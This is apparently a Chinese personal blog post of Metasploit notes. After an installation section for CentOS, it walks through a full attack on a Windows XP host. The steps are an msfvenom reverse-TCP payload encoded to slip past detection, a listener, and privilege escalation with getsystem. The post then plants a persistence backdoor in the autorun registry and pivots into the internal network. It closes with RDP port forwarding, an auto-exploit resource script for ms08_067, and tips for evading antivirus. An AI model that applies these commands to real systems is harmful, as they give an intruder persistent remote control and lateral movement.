metasploit

整理msf常用的一些东西。

centos6下msf环境配置

腾讯云的学生机,平时用来做转发的,只有1M带宽...转发到物理机上经常掉线,不知道少一层转发,直接在上面搞会不会缓解一些。
安装各种包的时候,先切到对应目录下看下,改下版本,安装最新的。
更新软件包:

yum -y update
yum -y upgrade

centos版本:

[root@VM_28_164_centos ~]# cat /etc/issue
CentOS release 6.8 (Final)

安装msf

安装依赖包

yum groupinstall ‘Development Tools‘

yum install sqlite-devel libxslt-devel libxml2-devel java-1.7.0-openjdk libpcap-devel nano openssl-devel zlib-devel libffi-devel gdbm-devel readline-devel nano wget

安装Ruby:

cd /usr/src 

wget http://pyyaml.org/download/libyaml/yaml-0.1.6.tar.gz

tar zxvf yaml-0.1.6.tar.gz 

cd yaml-0.1.6

./configure --prefix=/usr/local

make && make install

cd /usr/src 

wget http://ftp.ruby-lang.org/pub/ruby/2.2/ruby-2.2.1.tar.gz

tar zxvf ruby-2.2.1.tar.gz

cd ruby-2.2.1

./configure --prefix=/usr/local --with-opt-dir=/usr/local/lib

make && make install

安装postgresql:

exclude=postgresql* 

wget http://yum.postgresql.org/9.4/redhat/rhel-6-x86_64/pgdg-centos94-9.4-3.noarch.rpm

rpm -ivh pgdg-centos94-9.4-3.noarch.rpm

yum update 

yum install postgresql94-server postgresql94-devel postgresql94

service postgresql-9.4 initdb 

service postgresql-9.4 start

chkconfig postgresql-9.4 on

echo export PATH=/usr/pgsql-9.4/bin:$PATH >> /etc/bashrc 

source ~/.bashrc

su - postgres

createuser msf -P -S -R -D 

createdb -O msf msf

exit



vi /var/lib/pgsql/9.4/data/pg_hba.conf
在最下面添加三行:
local    msf             msf                                     md5
host     msf             msf             127.0.0.1/8             md5
host     msf             msf             ::1/128                 md5

service postgresql-9.4 restart

gem install wirble pg sqlite3 msgpack activerecord redcarpet rspec simplecov yard bundler


安装metasploit:

cd /opt 

git clone https://github.com/rapid7/metasploit-framework.git

cd metasploit-framework

bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

ln -s /opt/metasploit-framework/armitage /usr/local/bin/armitage

bundle install

vi /opt/metasploit-framework/database.yml
写入下面内容:(注意冒号后面一定要有空格)
 production:
 adapter: postgresql
 database: msf
 username: msf
 password: msf
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5

echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/database.yml >> /etc/bashrc 

source ~/.bashrc

然后msfconsole就可以看到成功了。
msfupdate 更新msf
service postgresql-9.4 start 启动postgresql
chkconfig postgresql-9.4 on 加到启动项

持久化控制

msf下的持久化控制模块有两个:

  • Persistence

  • Metsvc

metsvc后门作为一个服务在目标上运行,但是这个后门容易被发现,并且它是无认证的,谁发现了谁就能连接。
相比之下,更推荐Persistence,也是创建一个随系统启动的服务来运行的。

attacker:centos6.8 metasploit v4.14.3-dev-06e6a97
victim:windows xp sp3

生成exe:

msf > msfvenom -p windows/meterpreter/reverse_tcp -a x86 --plat windows LHOST=My_ip LPORT=6666 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o test.exe

监听:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > ifconfig 
[*] exec: ifconfig 

eth0      Link encap:Ethernet  HWaddr 52:54:00:16:00:8A  
          inet addr:10.104.28.164  Bcast:10.104.63.255  Mask:255.255.192.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:135178 errors:0 dropped:0 overruns:0 frame:0
          TX packets:86073 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:11693157 (11.1 MiB)  TX bytes:15675660 (14.9 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:4456 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4456 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1319131 (1.2 MiB)  TX bytes:1319131 (1.2 MiB)

msf exploit(handler) > set lhost 10.104.28.164
lhost => 10.104.28.164
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.104.28.164:6666 
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (957487 bytes) to xx
[*] Meterpreter session 1 opened (10.104.28.164:6666 -> xx:26443) at 2017-03-20 08:09:56 +0800

要说明的是,这里监听的host要是内网IP,外网ip不行。
还有就是exploit -j -z 表示在后台监听,并且获得session后不立即交互。

接下来提权至system并配置持久化控制

msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                     Information                                      Connection
  --  ----                     -----------                                      ----------
  1   meterpreter x86/windows  DH-CA8822AB9589\Administrator @ DH-CA8822AB9589  10.104.28.164:6666 -> xx:26443 (10.10.10.131)

msf exploit(handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DH-CA8822AB9589\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

msf post(persistence_exe) > sessions 1
[*] Starting interaction with 1...

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back


meterpreter > run persistence -X -i 50 -p 6666 -r my_ip

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DH-CA8822AB9589_20170320.1305/DH-CA8822AB9589_20170320.1305.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=my_ip LPORT=6666
[*] Persistent agent script is 99680 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nqzUjRnXytp.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nqzUjRnXytp.vbs
[+] Agent executed with PID 3324
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lbKsQWfuWoXMZ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lbKsQWfuWoXMZ
meterpreter > background 

写入成功,然后xp那边shutdown /r /t 0 重启,session掉线。

[*] Backgrounding session 1...
msf post(persistence_exe) > [*] 10.10.10.131 - Meterpreter session 1 closed.  Reason: Died

登陆xp后,session再次上线。

msf exploit(handler) > [*] Sending stage (957487 bytes) to xx
[*] Meterpreter session 2 opened (10.104.28.164:6666 -> xx:45667) at 2017-03-20 08:17:37 +0800

如果遇到杀软的话,可先迁移到杀软信任的进程上,再run。但是迁移进程也会被拦截,这时可以试试抓hash或者明文,然后开3389连上去手动加到杀软白名单。如果开3389被拦截,可以run getgui –e 来开。

这个persistence有两个好处,一是对面机器重启之后,监听能重启上线,不需要再运行exe。
二是你的msf重启之后再次监听也能上线,因为是用的vps搭建的,vps经常掉线,然后session就会掉,每次都得重新走一遍流程,以前被这个问题搞得很头大,现在方便多了。

在虚拟机的kali里面,我也测试了这个模块,但是失败,谷歌了一圈说是kali的锅,没找到结局办法。

参考:
https://sathisharthars.com/2014/05/24/create-a-persistence-backdoor-after-exploit-in-windows-os-using-metasploit/
http://www.ztik.nl/doku.php?id=blog:metasploit

代理和转发

路由表

通常,获得一个session后,便是提权,探测内网。msf下提供了一个路由表的功能,能十分方便的进行内网的探测。

先看下本地网关,

meterpreter > run get_local_subnets 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
Local subnet: 1.0.0.0/255.0.0.0
Local subnet: 10.10.200.0/255.255.255.0
Local subnet: 10.10.200.0/255.255.255.0
Local subnet: 10.10.200.0/255.255.255.0

配置路由表,-s参数指定subnet

meterpreter > run autoroute -s 10.10.200.1

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.10.200.1/255.255.255.0...
[+] Added route to 10.10.200.1/255.255.255.0 via xx
[*] Use the -p option to list all active routes
meterpreter > background 
[*] Backgrounding session 4...

查看路由表:

msf exploit(handler) > route 

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.10.200.1        255.255.255.0      Session 4

[*] There are currently no IPv6 routes defined.

已经配置成功,然后就可以对内网进行一番探测了。
路由表好像是一个指定数据怎么转发的东西,你配置了路由表,数据就用你指定的来路由。
貌似是只支持tcp的扫描,我尝试用syn来扫端口的时候失败了。

收集一些常用的脚本:

  • auxiliary/scanner/portscan/tcp

  • auxiliary/scanner/smb/smb_login

  • auxiliary/scanner/smb/smb_enumusers

  • auxiliary/scanner/mssql/mssql_ping

  • auxiliary/scanner/smb/smb_version

  • auxiliary/scanner/ssh/ssh_version

  • auxiliary/scanner/ftp/ftp_version

  • auxiliary/scanner/ftp/anonymos

  • auxiliary/scanner/snmp/snmp_login

  • auxiliary/scanner/vnc/vnc_none_auth

  • auxiliary/scanner/mssql/mssql_login

  • exploit/windows/mssql/mssql_payload

端口转发

portfwd
这个也挺好用的,一般用来在获得session后把3389转发出来
例如把3389转发到本地33891,

meterpreter > portfwd add -l 33891 -r 127.0.0.1 -p 3389
[*] Local TCP relay created: :33891 <-> 127.0.0.1:3389

这样直接连接vps的33891就相当于是目标的3389了。
这里会有一个问题,用windows的mstsc.exe连接出现了“由于数据加密错误,这个会话将结束。请重新连接到远程计算机”。
但是用rdesktop就没这个问题,但是我的vps有没有图形界面,就只能用物理机连。
这时候换个mstsc就能连上了,我用的RMDSTC.exe就可以连上。

socks代理

一些小技巧

set/unset 设置/取消设置
setg/unsetg  设置/取消全局选项
save  保存,下次启动仍然生效

MSF 脚本文件: 为了缩短测试时间可以将 msf 命令写入一个文件,然后在 msf 中加载它。 
加载方式:msfconsole 的 resource 命令或者 msfconsole 加上-r 选项 
例子: 
echo‘version’>resource.rc 
echo‘loadsounds’>> resource.rc 
msfconsole–r resource.rc
例子: 
echo‘useexploit/windows/smb/ms08_067_netapi’>autoexp.rc 
echo‘setRHOST192.168.1.133’>>autoexp.rc 
echo‘setPAYLOAD windows/meterpreter/reverse_tcp’>>autoexp.rc 
echo‘setLHOST192.168.1.111’>> autoexp.rc 
echo‘exploit’>> autoexp.rc msfconsole 
msf>resource autoexp.rc

标签: none

添加新评论